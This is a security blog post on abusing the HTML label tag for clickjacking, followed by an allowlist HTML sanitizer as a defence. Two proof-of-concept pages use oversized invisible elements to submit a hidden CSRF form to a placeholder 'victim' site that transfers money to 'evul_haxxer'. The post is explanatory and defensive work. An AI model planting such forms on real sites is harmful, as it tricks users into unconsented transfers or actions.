Another niche attack. I happened to notice the interesting behaviour of the <label> tag today while working on some web application development.
<label for="target">_STUFF_</label>
The for attribute forwards a click to the element whose id matches its value. Clicking anything between the label's start and end tags triggers the click event on a range of different input elements. This is intended behaviour, but it can be abused for clickjacking.
Here is a way to abuse it for submitting CSRF forms.
<!doctype html>
<html>
  <body>
    <label
      for="target_element"
      style="display: block; height: 13370px; width: 100%;"
    >
    </label>
    <form method="post" action="http://victim" style="display: none;">
      <input type="text" name="moneys" value="all" />
      <input type="text" name="recipient" value="evul_haxxer" />
      <input
        id="target_element"
        type="submit"
        name="send"
        value="Send moneys"
      />
    </form>
  </body>
</html>
Of course, it’s a bit redundant. The following snippet does the same thing without using the label tag at all.
<!doctype html>
<html>
  <body>
    <form method="post" action="http://victim">
      <input
        id="target_element"
        type="submit"
        name="send"
        value="Send moneys"
        style="display: block; height: 13370px; width: 100%; opacity: 0;"
      />
      <input type="text" name="moneys" value="all" />
      <input type="text" name="recipient" value="evul_haxxer" />
    </form>
  </body>
</html>
I tested both of these in Firefox with NoScript and they pass.
But imagine a scenario where the HTML filtering is not quite as secure as it should be and the label tag can be submitted. Then it could be abused to trigger clicks on the rendered site without the user's consent. Imagine a social media site with a "like" function à la Facebook, for example. Triggering a click on the like button could make for some fun Samy-like worms.
Fortunately, most sites use whitelists for HTML user input these days.
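The whitelist approach the last paragraph refers to, as an added example that is not code from the original post. It is a small allowlist sanitizer built on Python's standard-library html.parser: only a fixed set of tags and per-tag attributes survive, so a user-submitted <label for="..."> (along with form, input, style, id and event-handler attributes) never reaches the rendered page where it could forward a click to one of the site's own controls. The allowed tag set, the id "like-button" and the sample comment are constructed for the demonstration, not taken from any real site.

```python
"""Allowlist HTML sanitizer for user-submitted markup (stdlib only).

Added example, not code from the original post. Tags and attributes that
are not explicitly listed are dropped; the text inside a dropped tag is
kept. Because <label> and the for attribute are not on the list, a
comment cannot carry a click-forwarding label onto the page.
"""
from html import escape
from html.parser import HTMLParser

# Only these tags survive; label, form, input, script, etc. are dropped.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}

# Attributes are allowlisted per tag. "for", "style", "id" and on* handlers
# are never listed, so they are removed even from allowed tags.
ALLOWED_ATTRS = {"a": {"href"}}

# Only these URL schemes are kept in href values.
ALLOWED_SCHEMES = ("http://", "https://", "mailto:")

# Tags that take no closing tag.
VOID_TAGS = {"br"}


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; its text still arrives via handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not (value or "").lower().startswith(ALLOWED_SCHEMES):
                continue  # drop javascript:, data:, relative and other unlisted schemes
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        # Self-closing syntax: emit an open tag and, for non-void tags, a close.
        self.handle_starttag(tag, attrs)
        self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Parser has already decoded character references; re-escape text.
        self.out.append(escape(data, quote=False))


def sanitize(html):
    """Return html with only allowlisted tags/attributes, text escaped."""
    parser = _Sanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed sample: a comment submitted to a site that renders limited
# HTML. The label would forward any click inside the comment to the page's
# own control with id="like-button" if it were allowed through.
SAMPLE_COMMENT = (
    "<p>Nice post! <b>Agreed</b>.</p>"
    '<label for="like-button" style="display:block;height:9999px">'
    "click anywhere</label>"
    '<a href="javascript:alert(1)" onclick="x()">link</a> '
    '<a href="https://example.org">ok</a>'
)

if __name__ == "__main__":
    print(sanitize(SAMPLE_COMMENT))
```

Anything not on the list is removed rather than anything on a blocklist being stripped, which is the property that matters here: a new click-forwarding element or attribute added to HTML later is rejected by default instead of slipping through until someone updates the filter.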